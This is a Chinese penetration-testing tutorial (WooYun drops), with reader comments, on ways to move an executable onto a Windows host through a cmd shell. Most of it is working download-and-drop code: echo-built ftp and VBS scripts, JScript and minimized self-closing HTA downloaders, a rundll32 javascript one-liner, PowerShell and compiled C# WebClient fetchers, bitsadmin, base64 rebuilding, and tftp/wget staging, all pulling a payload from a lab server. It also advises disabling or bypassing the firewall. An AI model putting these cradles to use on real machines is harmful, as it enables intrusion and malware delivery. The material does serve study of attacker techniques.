渗透技巧——通过cmd上传文件的N种方法

0x00 前言


在渗透测试的过程中,常常需要向目标主机上传文件,我在最近的学习测试过程中就碰到了这个问题,要求只能通过cmd shell向目标主机(Windows系统)上传文件,所以本文就对该技巧做一下总结。

Alt text

图片来自于http://www.telegraph.co.uk/news/worldnews/northamerica/usa/11754089/Hacker-remotely-crashes-Jeep-from-10-miles-away.html

0x02 测试环境


OS:Win7 x86
test exe:ssss2.exe,成功运行后输出1

0x03 通用上传方法


1、 debug

debug是一个程序调试工具,功能包括:

  • 直接输入,更改,跟踪,运行汇编语言源程序
  • 观察操作系统的内容
  • 查看ROM BIOS的内容
  • 观察更改RAM内部的设置值
  • 以扇区或文件的方式读写软盘数据

特别的是它还有一个功能可以将十六进制代码转换为可执行文件:

Alt text

结合本文的目标,思路如下:

  1. 把需要上传的exe转换成十六进制hex的形式
  2. 通过echo命令将hex代码写入文件
  3. 使用debug功能将hex代码还原出exe文件

实际测试:

kali中的exe2bat.exe提供了这个功能,位于/usr/share/windows-binaries

如图

Alt text

操作步骤:

kali:

#!bash
cd /usr/share/windows-binaries
wine exe2bat.exe ssss2.exe ssss2.txt

执行后会生成ssss2.txt,将里面的内容复制粘贴到cmd命令行下依次执行

执行后会生成1.dll、123.hex、ssss.exe

如图

Alt text

注:
exe2bat不支持大于64kb的文件 debug默认只支持在32位系统

如图

Alt text

2、ftp

搭建好ftp服务器:

ip:192.168.174.151
文件:ssss2.exe

按顺序执行如下代码即可通过ftp来下载文件

cmd:

#!bash
echo open 192.168.174.151 21> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo ftp>> ftp.txt
echo GET ssss2.exe >> ftp.txt
ftp -s:ftp.txt

如图

Alt text

注:
初次使用ftp下载防火墙会弹框拦截,使用前记得要先添加防火墙规则

3、vbs

vbs downloader,使用msxml2.xmlhttp和adodb.stream对象

如下代码保存为.vbs文件:

#!vb
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.174.145/ssss2.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\test\update\ssss2.exe",2

对应到cmd下的命令为:

#!bash
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://192.168.174.145/ssss2.exe",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "C:\test\update\ssss2.exe",2 >>download.vbs

按顺序依次执行后会生成download.vbs,然后执行download.vbs即可实现下载ssss2.exe

4、powershell

cmd:

#!powershell
powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.174.145/ssss2.exe','C:\test\update\ssss2.exe')

5、csc

csc.exe是微软.NET Framework 中的C#编译器,Windows系统中默认包含,可在命令行下将cs文件编译成exe

c# downloader的代码为:

#!csharp
using System.Net;
namespace downloader
{
    class Program
    {
        static void Main(string[] args)
        {
            WebClient client = new WebClient();
            string URLAddress = @"http://192.168.174.145/ssss2.exe";
            string receivePath = @"C:\test\update\";
            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName
        (URLAddress));
        }
    }
}

使用echo将代码依次写入文件download.cs中,然后调用csc.exe编译cs文件

执行

#!bash
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\tes
t\update\download.exe C:\test\update\download.cs

如图成功生成download.exe

Alt text

注:
csc.exe的绝对路径要根据系统的.net版本来确定

6、JScript

相比于JSRat中用的Scripting.FileSystemObject

换用ADODB.Stream实现起来更加简单高效

以下代码依次保存为js文件,直接执行即可实现下载文件

#!js
var Object = WScript.CreateObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.174.145/ssss2.exe",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = WScript.CreateObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\\test\\update\\ssss2.exe", 2);
    Stream.Close();
}

合并成rundll32的一句话(类似于JSRat的启动方式):

cmd:

#!bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();Object=new%20ActiveXObject("Microsoft.XMLHTTP");Object.open("GET","http://192.168.174.145/ssss2.exe",false);Object.send();if(Object.Status==200){Stream=new%20ActiveXObject("ADODB.Stream");Stream.Open();Stream.Type=1;Stream.Write(Object.ResponseBody);Stream.SaveToFile("C:\\test\\update\\ssss2.exe",2);Stream.Close();}

执行后会提示没有权限,很有趣的地方,更多的细节会在以后的文章介绍

Alt text

Alt text

7、hta

添加最小化和自动退出hta程序的功能,执行过程中会最小化hta窗口,下载文件结束后自动退出hta程序

以下代码保存为.hta文件:

#!js
<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.174.145/ssss2.exe",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = new ActiveXObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\\test\\update\\ssss2.exe", 2);
    Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</head>
<body>
</body>  
</html>

8、bitsadmin

bitsadmin是一个命令行工具,可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带

使用方法:

cmd下:

#!bash
bitsadmin /transfer n http://download.sysinternals.com/files/PSTools.zip  C:\test\update\PSTools.zip 

下载成功如图:

Alt text

注:
不支持https、ftp协议
使用kali的simplehttpserver作服务器会报错

9、base64

将exe先作base64加密,通过cmd上传后解密输出 对exe作base64加密的方法:

(1)powershell

$PEBytes = [System.IO.File]::ReadAllBytes("C:\windows\system32\calc.exe")
$Base64Payload = [System.Convert]::ToBase64String($PEBytes)
Set-Content base64.txt -Value $Base64Payload

运行后会将C:\windows\system32\calc.exe作base64加密并输出到base64.txt

(2)c#

using System;
using System.IO;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace test1
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] AsBytes = File.ReadAllBytes(@"C:\windows\system32\calc.exe");
            String AsBase64String = Convert.ToBase64String(AsBytes);
            StreamWriter sw = new StreamWriter(@"C:\test\base64.txt");
            sw.Write(AsBase64String);
            sw.Close();
        }
    }
}

(3)eml附件

(思路由猪猪侠提供)

server2003 默认包含outlook客户端C:\Program Files\Outlook Express

运行后-新建邮件-上传附件-另存为eml格式

使用notepad打开eml邮件,可看到加密的base64代码

如图

enter image description here

解密base64文件并生成exe的方法:

(1)powershell

$Base64Bytes = Get-Content (base64.txt)
$PEBytes= [System.Convert]::FromBase64String($Base64Bytes)
Set-Content calc.exe -Value $PEBytes

(2)c#

using System;
using System.IO;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace test1
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] AsBytes = File.ReadAllBytes(@"C:\test\base64.txt");
            String AsBase64String = Convert.FromBase64String(AsBytes);
            StreamWriter sw = new StreamWriter(@"C:\test\calc.exe");
            sw.Write(AsBase64String);
            sw.Close();
        }
    }
}

注: 读文件的操作可替换为base64代码直接写入脚本文件中

0x04 补充上传方法


以上均为系统默认包含的程序,结合以上方法并借助于第三方工具也能够实现功能

这里介绍的思路是可先通过bitsadmin来下载第三方工具,然后利用第三方工具进行传输文件

1、wget:

#!bash
bitsadmin /transfer n http://www.interlog.com/~tcharron/wgetwin-1_5_3_1-binary.zip  C:\test\update\wget.zip

运行后会下载wget的压缩包wget.zip

注:
Windows系统默认不包含解压缩zip文件的命令,但是可以通过vbs来实现解压缩zip文件

vbs实现解压缩:

以下代码保存为.vbs文件:

#!vb
UnZip "C:\test\update\wget.zip","C:\test\update\wget\"
Sub UnZip(ByVal myZipFile, ByVal myTargetDir)
    Set fso = CreateObject("Scripting.FileSystemObject")
    If NOT fso.FileExists(myZipFile) Then
        Exit Sub
    ElseIf fso.GetExtensionName(myZipFile) <> "zip" Then
        Exit Sub
    ElseIf NOT fso.FolderExists(myTargetDir) Then
        fso.CreateFolder(myTargetDir)
    End If
    Set objShell = CreateObject("Shell.Application")
    Set objSource = objShell.NameSpace(myZipFile)
    Set objFolderItem = objSource.Items()
    Set objTarget = objShell.NameSpace(myTargetDir)
    intOptions = 256
    objTarget.CopyHere objFolderItem, intOptions
End Sub

代码来自于http://demon.tw/programming/vbs-unzip-file.html

成功解压缩后就可通过wget.exe来传输文件

#!bash
C:\test\update\wget\wget.exe http://192.168.174.145/ssss2.exe

如图

Alt text

2、ftfp

思路同上,先通过bitsadmin下载tftp.exe,然后利用tftp传输文件

#!bash
bitsadmin /transfer n http://www.winagents.com/downloads/tftp.exe C:\test\update\tftp.exe

下载成功后利用tftp传输文件:

#!bash
tftp -i 192.168.174.151 GET tftp\ssss2.exe C:\test\update\ssss2.exe

注:
默认防火墙会拦截

关掉防火墙或者添加规则即可

如图

Alt text

0x05 小结


本文对一些常用的通过cmd来传输文件的技巧做了整理,侧重于介绍其中较为通用简便的方法,所以并未介绍其他需要配置开发环境的实现方法,如Python、Ruby、Php等,如果你有更好的实现方法,欢迎与我交流,共同学习。

0x06 参考资料


本文由三好学生原创并首发于乌云drops,转载请注明

©乌云知识库版权所有 未经许可 禁止转载


30
whynot 2016-05-04 17:12:45

姿势竟然这么多。。学习了

30
小白兔 2016-04-28 08:05:32

刚才那个debug问题看到答案了,请大神自动忽略。
能不能比较一下各种方案的优缺点还有传输速率这一块呢?

30
小白兔 2016-04-23 10:19:40

先膜拜大神
PS:debug.exe这个程序不是系统自带的吧?我没有找到呢

30
MillionSky 2016-04-13 16:18:05

Base64-Powershell的解码有问题,生成的起始是exe每个字节的十进制字符串

30
_Evil 2016-04-12 23:13:57

http://www.2cto.com/Article/201305/209920.html 这个也很好玩的 大神。

30
无敌情痴 2016-04-09 21:59:48

膜拜大神

30
三好学生 2016-04-07 11:43:40

@猪猪侠 @数据流 内容已做补充更正~

30
Weiy、 2016-04-06 17:10:26

好文章、可是Debug、我放弃了和bitsadmin 感觉利用价值不高!

30
Tr4c3 2016-04-06 05:39:31

总结的不错。
不过debug这条基本可以放弃,zzzevazzz大牛说过:“写文件用ADODB.Recordset,比debug好使多了。”

30
K4r1iNNg 2016-04-06 02:45:49

有个很像的 方法, 以前见过有个vbs能把exe转bat

30
Her0in 2016-04-05 22:42:29

只要有了cmd shell, 写一个批处理文件就可以搞定上传下载和隐藏执行了,苛刻的条件下完全没必要借助任何其他的exe,搞不好就被秒。

30
L3m0n 2016-04-05 22:15:21

刚刚想到如果那个debug的文件内容用鼠标的宏去存储,然后一键跑起....一个一个的手输真的很麻烦。

30
落落 2016-04-05 15:52:28

之前研究过 得到的结论是 ftp 最稳定 其次是vbs的base64转exe(补充下)|| wget vbs 其他的根据系统版本问题 各种不稳定

30
刘海哥 2016-04-05 14:01:39

我记得我前段时间在测试csc老是因为权限的问题编译不出来。

30
IzualYang 2016-04-05 13:49:59

以前不是总结过么
/tips/?id=2420

30
L3m0n 2016-04-05 13:19:24

学习了,比如编译型的,https://github.com/samratashok/nishang/blob/master/Utility/ExetoText.ps1
使用telnet,
服务端:nc -lvp 23 < nc.exe
下载端:telnet ip -f c:\nc.exe
/tips/?id=783
最后膜拜一下师傅,=。=,可以给一个qq号联系方式么,

30
苦咖啡 2016-04-05 13:14:35

学习了 好知识

30
数据流 2016-04-05 12:36:33

Debug.exe只能在32位下的系统,64位是没有这个命令的

30
bigx 2016-04-05 12:34:24

学习了

30
花尽无花 2016-04-05 12:31:46

JS/TrojanDownloader.Psyme.NEV 特洛伊木马,真是醉了

30
lxj616 2016-04-05 12:31:20

@猪猪侠 这个思路真是diao

30
Elliot-Su 2016-04-05 12:26:07

Mark

30
猪猪侠 2016-04-05 12:12:49

还有一个路子,邮件草稿另存为EML,Base64,还原里面附带的附件

30
珈蓝夜宇 2016-04-05 10:38:15

这篇文章写的太棒了,为什么没有打赏。。。

感谢楼主。

30
0hey_boy0 2016-04-05 10:36:24

都是好思路,学习了

30
king7 2016-04-05 10:33:58

干货,开眼了

感谢知乎授权页面模版